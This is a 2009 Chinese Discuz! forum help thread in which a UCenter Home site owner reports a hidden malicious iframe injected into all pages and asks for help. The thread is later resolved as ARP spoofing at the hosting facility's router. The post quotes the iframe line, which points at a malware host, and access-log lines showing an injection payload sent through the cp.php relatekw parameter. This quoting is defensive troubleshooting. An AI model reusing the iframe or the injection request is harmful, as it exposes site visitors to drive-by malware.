设为首页收藏本站
切换到宽版

Discuz!官方免费开源建站系统

 找回密码
 立即注册
搜索
Discuz!官方免费开源建站系统»论坛 增值产品交流与讨论 UCenter Home 专区 UCenter Home-安装使用 求助:被挂马,UCH有被攻击的迹象
返回列表 发新帖

[已解决] 求助:被挂马,UCH有被攻击的迹象

[复制链接]
tearszhu 发表于 2009-9-24 09:31:44 | 显示全部楼层 |阅读模式
本帖最后由 tearszhu 于 2009-9-24 10:30 编辑

昨天服务器上所有的网站突然被挂上一段代码
  1. <iframe src=http://se362c.3322.org/jj/7.htm width=111 height=0 border=0></iframe>      
复制代码
首先排除了是本地网络的问题,在其他地方也出现相同的情况,而本地访问其他网站没有问题。
所有在服务器上的文件都会出现那一行代码,包括404页面
而直接在服务器上下载下来的文件上没有出现那一行代码
如果把一个空的文件上传到服务器上,通过网络访问该文件,都会加上那一行代码

查找日志时发现,日志1G多,日志中有两行是与该代码有关

  2. logs/access_log:218.28.249.222 - - [23/Sep/2009:17:01:58 +0800] "GET /cp.php?ac=relatekw&subjectenc=\xc8\xc3\xd0\xc4\xc1\xe9\xb4\xf8\xd7\xc5\xce\xd2

  4. \xc3\xc7\xd7\xdf\xcf\xf2\xc0\xed\xcf\xeb\xb5\xc4\xc9\xfa\xbb\xee\xc8\xc3\xd0\xc4\xc1\xe9\xb4\xf8\xd7\xc5\xce\xd2\xc3\xc7\xd7\xdf\xcf\xf2\xc0\xed\xcf\xeb\xb5

  6. \xc4\xc9\xfa\xbb\xee&messageenc=<IFRAME%20border=0%20src="http://se362c.3322.org/jj/7.htm"%20width=111%20height=0></IFRAME><STYLE>body%20{%20font-

  8. size:14px;%20line-height:1.8em;%20padding-right:%204px;%20padding-left:%208px;%20padding-bottom:%208px;%20margin:%200px;%20padding-top:%208px;%20}

  10. </STYLE><META%20content="mshtml%206.00.2900.3132"%20name=generator>&inajax=1 HTTP/1.1" 200 76




  15. logs/access_log:218.28.249.222 - - [23/Sep/2009:17:02:01 +0800] "GET /cp.php?ac=relatekw&subjectenc=\xc8\xc3\xd0\xc4\xc1\xe9\xb4\xf8\xd7\xc5\xce\xd2

  17. \xc3\xc7\xd7\xdf\xcf\xf2\xc0\xed\xcf\xeb\xb5\xc4\xc9\xfa\xbb\xee&messageenc=<IFRAME%20border=0%20src="http://se362c.3322.org/jj/7.htm"%20width=111%

  19. 20height=0></IFRAME><STYLE>body%20{%20font-size:14px;%20line-height:1.8em;%20padding-right:%204px;%20padding-left:%208px;%20padding-bottom:%208px;%

  21. 20margin:%200px;%20padding-top:%208px;%20}</STYLE><META%20content="mshtml%206.00.2900.3132"%20name=generator>&inajax=1 HTTP/1.1" 200 76
复制代码
不知是否与UCH有关,请达人帮忙,感谢。

服务器环境是Lamp
回复

使用道具 举报

scckfzx 发表于 2009-9-24 09:43:37 | 显示全部楼层
本帖最后由 scckfzx 于 2009-9-24 09:45 编辑

基本上判断是你的服务器被挂马了
这种挂马一般并没有真正的修改你的文件,而是在你的页面执行完毕后由APACHE在每个页面增加一段代码!所以你看文件是看不出来的,只有在IE中查看源代码才能看到,
用免费空间的都知道,免费空间会自动在你的网站页面底部增加代码的道理是一样的

评分

1

查看全部评分

回复

使用道具 举报

 楼主| tearszhu 发表于 2009-9-24 09:55:07 | 显示全部楼层
基本上判断是你的服务器被挂马了
这种挂马一般并没有真正的修改你的文件,而是在你的页面执行完毕后由APAC ...
scckfzx 发表于 2009-9-24 09:43 AM



    您好,不知道如何能解决呢?
回复

使用道具 举报

huaxuanso 发表于 2009-9-24 09:56:16 | 显示全部楼层
我和楼主一样。。可怜啊

评分

1

查看全部评分

回复

使用道具 举报

 楼主| tearszhu 发表于 2009-9-24 10:02:36 | 显示全部楼层
我和楼主一样。。可怜啊
huaxuanso 发表于 2009-9-24 09:56 AM



    是否找到解决办法?
回复

使用道具 举报

 楼主| tearszhu 发表于 2009-9-24 10:29:54 | 显示全部楼层
已经解决,是机房路由中了ARP,感谢楼上朋友的顶帖
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-9-11 16:55 , Processed in 0.100482 second(s), 15 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表